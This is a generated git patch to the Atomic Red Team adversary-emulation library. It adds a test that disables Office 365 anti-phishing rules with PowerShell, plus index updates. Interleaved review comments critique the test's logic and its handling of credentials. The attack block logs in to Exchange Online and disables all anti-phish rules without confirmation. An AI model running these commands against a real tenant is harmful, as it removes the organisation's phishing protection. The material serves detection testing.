From e95076c17d316d1e79baf4fd442fb85e828fef24 Mon Sep 17 00:00:00 2001
From: CircleCI Atomic Red Team doc generator
Date: Mon, 30 Aug 2021 19:16:31 +0000
Subject: [PATCH] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

---
 .../art-navigator-layer-office-365.json | 2 +-
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/linux-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/linux-index.md | 1 +
 atomics/Indexes/index.yaml | 46 +++++++++++++
 atomics/T1562.001/T1562.001.md | 65 +++++++++++++++++++
 7 files changed, 116 insertions(+), 1 deletion(-)

diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
index c35e563a..f9a8214d 100644
--- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
+++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-office-365.json
@@ -1 +1 @@
-{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[]}
\ No newline at end of file
+{"version":"4.2","name":"Atomic Red Team (Office-365)","description":"Atomic Red Team (Office-365) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1562.001","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"},{"techniqueID":"T1562","score":100,"enabled":true,"comment":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f12bbbeb..44028ad9 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -343,6 +343,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,21,Uninstall Crowdstrike Falco
 defense-evasion,T1562.001,Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
 defense-evasion,T1562.001,Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 defense-evasion,T1055.001,Dynamic-link Library Injection,1,Process Injection via mavinject.exe,74496461-11a1-4982-b439-4d87a550d254,powershell
diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv
index bd4769f1..a9f57a20 100644
--- a/atomics/Indexes/Indexes-CSV/linux-index.csv
+++ b/atomics/Indexes/Indexes-CSV/linux-index.csv
@@ -97,6 +97,7 @@ defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601
 defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
 defense-evasion,T1562.001,Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
+defense-evasion,T1562.001,Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
 defense-evasion,T1574.006,Dynamic Linker Hijacking,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
 defense-evasion,T1574.006,Dynamic Linker Hijacking,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
 defense-evasion,T1070.004,File Deletion,1,Delete a single file - Linux/macOS,562d737f-2fc6-4b09-8c2a-7f8ff0828480,sh
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 08c541da..0ab7a8b7 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -573,6 +573,7 @@
 - Atomic Test #22: Tamper with Windows Defender Evade Scanning -Folder [windows]
 - Atomic Test #23: Tamper with Windows Defender Evade Scanning -Extension [windows]
 - Atomic Test #24: Tamper with Windows Defender Evade Scanning -Process [windows]
+ - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md
index f364dbbc..49bcc017 100644
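Review bot: The added row in linux-index.csv lists `office-365-Disable-AntiPhishRule`, whose platform is office-365 and whose executor is powershell, so the Linux index now advertises a test that cannot run on Linux. Only index.csv and linux-index.csv changed in this patch, which suggests the generator's per-platform filter is sorting office-365 into the linux bucket instead of a dedicated office-365 index; that is inferred from the diffstat, not visible in this hunk. Because this file is generated, the fix belongs in the index generator's platform filter rather than in this CSV, and the same mis-filing appears in linux-index.md further down.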
--- a/atomics/Indexes/Indexes-Markdown/linux-index.md
+++ b/atomics/Indexes/Indexes-Markdown/linux-index.md
@@ -220,6 +220,7 @@
 - Atomic Test #2: Disable Cb Response [linux]
 - Atomic Test #3: Disable SELinux [linux]
 - Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
+ - Atomic Test #25: office-365-Disable-AntiPhishRule [office-365]
 - T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index cb20e020..37676f1b 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -24532,6 +24532,52 @@ defense-evasion: Remove-MpPreference -ExclusionProcess $excludedProcess name: powershell elevation_required: true + - name: office-365-Disable-AntiPhishRule + auto_generated_guid: b9bbae2c-2ba6-4cf3-b452-8e8f908696f3 + description: 'Using the Disable-AntiPhishRule cmdlet to disable antiphish rules + in your office-365 organization. + +' + supported_platforms: + - office-365 + input_arguments: + username: + description: office-365 username + type: String + default: + password: + description: office-365 password + type: String + default: + dependency_executor_name: powershell + dependencies: + - description: 'ExchangeOnlineManagement PowerShell module must be installed + +' + prereq_command: | + $RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable + if (-not $RequiredModule) {exit 1} + if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0} + get_prereq_command: | + Install-Module -Name ExchangeOnlineManagement + Import-Module ExchangeOnlineManagement + executor: + command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-ExchangeOnline -Credential $creds + $test = Get-AntiPhishRule + Disable-AntiPhishRule -Identity $test.Name -Confirm:$false + Get-AntiPhishRule + cleanup_command: | + $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force + $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd + Connect-ExchangeOnline -Credential $creds + $test = Get-AntiPhishRule + Enable-AntiPhishRule -Identity $test.Name -Confirm:$false + Get-AntiPhishRule + name: powershell + elevation_required: false T1078.002: technique: external_references: diff --git a/atomics/T1562.001/T1562.001.md b/atomics/T1562.001/T1562.001.md index ba2e2af9..7164b66b 100644 --- a/atomics/T1562.001/T1562.001.md 
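Review bot: `Disable-AntiPhishRule -Identity $test.Name` in the executor only works when the tenant has exactly one anti-phish rule: with several rules `$test.Name` is an array and `-Identity` takes a single value, and with none `$test` is null, so the command fails either way, and the cleanup_command has the same shape. The cleanup also re-enables every rule it finds, including any rule the tenant had deliberately disabled before the test ran, so it does not restore the prior state. I would act only on rules that are currently enabled, e.g. `Get-AntiPhishRule | Where-Object { $_.State -eq 'Enabled' } | ForEach-Object { Disable-AntiPhishRule -Identity $_.Name -Confirm:$false }`, and have the cleanup re-enable only the names the attack step disabled (this relies on the rule objects exposing a State property, which I believe they do — confirm against the cmdlet output). `elevation_required: false` also deserves a second look, since these cmdlets need an Exchange Online role that permits anti-phish policy management; a sentence in the description naming the required role would save users a failed run.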
+++ b/atomics/T1562.001/T1562.001.md
@@ -52,6 +52,8 @@
 - [Atomic Test #24 - Tamper with Windows Defender Evade Scanning -Process](#atomic-test-24---tamper-with-windows-defender-evade-scanning--process)
+- [Atomic Test #25 - office-365-Disable-AntiPhishRule](#atomic-test-25---office-365-disable-antiphishrule)
+
@@ -996,4 +998,67 @@ Remove-MpPreference -ExclusionProcess $excludedProcess +
+
+
+## Atomic Test #25 - office-365-Disable-AntiPhishRule
+Using the Disable-AntiPhishRule cmdlet to disable antiphish rules in your office-365 organization.
+
+**Supported Platforms:** Office-365
+
+
+**auto_generated_guid:** b9bbae2c-2ba6-4cf3-b452-8e8f908696f3
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | office-365 username | String | |
+| password | office-365 password | String | |
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Disable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+#### Cleanup Commands:
+```powershell
+$secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+$creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+Connect-ExchangeOnline -Credential $creds
+$test = Get-AntiPhishRule
+Enable-AntiPhishRule -Identity $test.Name -Confirm:$false
+Get-AntiPhishRule
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: ExchangeOnlineManagement PowerShell module must be installed
+##### Check Prereq Commands:
+```powershell
+$RequiredModule = Get-Module -Name ExchangeOnlineManagement -ListAvailable
+if (-not $RequiredModule) {exit 1}
+if (-not $RequiredModule.ExportedCommands['Connect-ExchangeOnline']) {exit 1} else {exit 0}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement
+Import-Module ExchangeOnlineManagement
+```
+
+
+
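Review bot: Both the attack and cleanup blocks call `Connect-ExchangeOnline -Credential $creds` and never disconnect, so every run leaves a remote PowerShell session open against the tenant until it times out; append `Disconnect-ExchangeOnline -Confirm:$false` as the last line of each block. Username/password sign-in also fails for accounts protected by MFA or in tenants where legacy authentication is blocked, which is increasingly the norm, so the description should state that the account must be able to authenticate non-interactively with a password or point at an alternative such as certificate-based app authentication. The password is a plain-text input argument that is interpolated into the command text, so it will show up in executor logs and shell history; a one-line warning under Inputs would make that explicit. This markdown mirrors index.yaml, so the changes belong in the test's YAML and should be regenerated rather than edited here; this hunk begins on an earlier line of the page.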